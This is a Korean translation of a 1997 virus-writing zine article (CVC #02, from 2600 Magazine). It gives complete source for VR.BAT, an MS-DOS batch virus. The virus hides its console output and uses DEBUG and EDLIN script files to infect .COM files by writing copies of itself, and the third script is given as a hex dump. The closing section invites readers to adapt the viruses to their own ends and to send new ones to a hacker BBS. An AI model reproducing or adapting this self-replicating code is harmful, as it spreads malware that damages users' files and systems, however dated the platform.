
 Batch 바이러스                                                 CVC #02  97/09

---------------------------------------------------------------------> NirWana

                            Batch Viruses
                            -------------

batch로 바이러스를 만들수 있다고 상상해본 사람이 있을까?  우리가 살펴볼
바이러스는 MS-DOS를 이용하고 있다.  이 batch 바이러스는 DEBUG와 EDLIN
을 사용한다.
( 역자 주 : 본인은 결코 edlin을 사용하지 않으므로 이 바이러스만은
      테스트해보지 않았다.  아직도 edlin을 사용할 바보가 어디있겠는가?
      돈벌이와 대한민국 소프트웨어 산업의 퇴보를 위해 제정신이 아닌 황희
      융아저씨라면 몰라도 말이다. 197,80년대에나 써먹던 수법을 가르치고
      있다니.... )

Name: VR.BAT

echo = off         ( 설명할 필요가 없다. )
ctty nul           ( 이것은 중요하다.  console로 아무것도 출력되지 않음 )
path c:\msdos      ( 다른 사람의 시스템에서는 다를수 있다. )
dir *.com/w>ind    ( 모든 .com화일명이 "ind"라는 화일에 화일명만 저장 )
edlin ind<1    ( "Ind" 에 있는 내용이 화일명만 남도록 edlin에 의해 처리 )
debug ind<2        ( debug에 의해서 화일을 조작 )
edlin name.bat<3   ( edlin에 의해 name.bat을 조작 )
ctty con           ( console입출력을 정상화 )
name               ( NAME.BAT 가 실행된다. )

위의 배치화일과 더불어 명령어가 담겨있는 1, 2, 3라는 화일을 보도록 하자.

첫번째 명령어 화일:
-------------------
화일명: 1

1,4d               ( "ind"에서 1~4번째 라인까지 지움 )
e                  ( 화일 저장 )

두번째 명령어 화일:
-------------------
화일명: 2

m100,10b,f000      (첫번째 감염시킬 프로그램 이름을 F000H 번지에 저장)
e108 ".BAT"        (화일 확장자를 .BAT로 변경)
m100,10b,f010      (화일명을 F010H 번지에 다시 저장)
e100"DEL "         (100H번지에 DEL 명령어를 집어넣는다. )
mf000,f00b,104     (원래의 화일명을 DEL명령어 뒤에 삽입)
e10c 2e            (확장자앞에 "."을 찍는다.)
e110 0d,0a         (Carrige return+ line feed)
mf010,f020,11f     (변경된 화일을 11FH 번지로..)
e112 "COPY \VR.BAT" ( COPY 명령어를 화일앞에 놓는다. )
e12b od,0a         (carriage return + lf)
rxc                ( 화일길이는... )
2c                 ( 2CH로 셋)
nname.bat          ( 화일명은 NAME.BAT)
w                  ( 쓰기 )
q                  ( 종료 )


세번째 명령어 화일에는 두개의 콘트롤 문자가 들어있어서 출력이 되지 않으므
로 16진수로 보여주어야만 하겠다.

세번째 명령어 화일의 16진 덤프내용:
-----------------------------------
화일명: 3

0100   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
       1  ,  1  ?        .  .  n  y  y  y  y  y  y  y
0110   79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
       y     .  2  ,  ?  ?  r     .  .  n  n  y  y  y
0120   79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
       y  y  y  y     .  E  .  .  .  .  .  .  .  .  .


이 바이러스가 작동하기 위해서는 VR.BAT가 루트디렉토리에 있어야만 한다.
이 프로그램은 오직 .COM화일만을 감염시킨다.


                              마지막 말
                              ---------
위의 모든 바이러스들은 당신의 목적에 맞게 고쳐도 좋다.  만일 어떤 흥미로운
바이러스를 보았으면, 즉시 Hacker's Den BBS로 내게 연락해주기 바란다.

추천 서적:

책명 Computer Viruses: A high Tech Disease
출판사 Abacus
저자 R. Burger
     ( 역자주 : 컴퓨터 바이러스가 일반인에게 알려지기 시작하는 초창기
         에 나온 고전적인 서적. 이미 고난도의 테크닉으로 발전하고 있는
         오늘날 그다지 읽어볼 필요는 없지만 읽어도 좋다. 이와 동급의
         고전적인(이젠 쓸모없는?) 책으로는 R. Roberts의 computer viruses
         와 P. Jonson외 2명의 공저인 the computer virus crisis가 있다. )

2600 Magazine: Volume 5, Number 2

-TC][-
                         This Corean version is translated by NirWana
                            Jeremy Bae   bluevile@dragonar.nm.cau.ac.kr

 Osiris : NirWana 님 CVC 는 Korea 라는 표기를 Corea 로 합니다. 그래서
          Korean version 이란 말을 Corean version 으로 편집했습니다.
          양해 바랍니다.

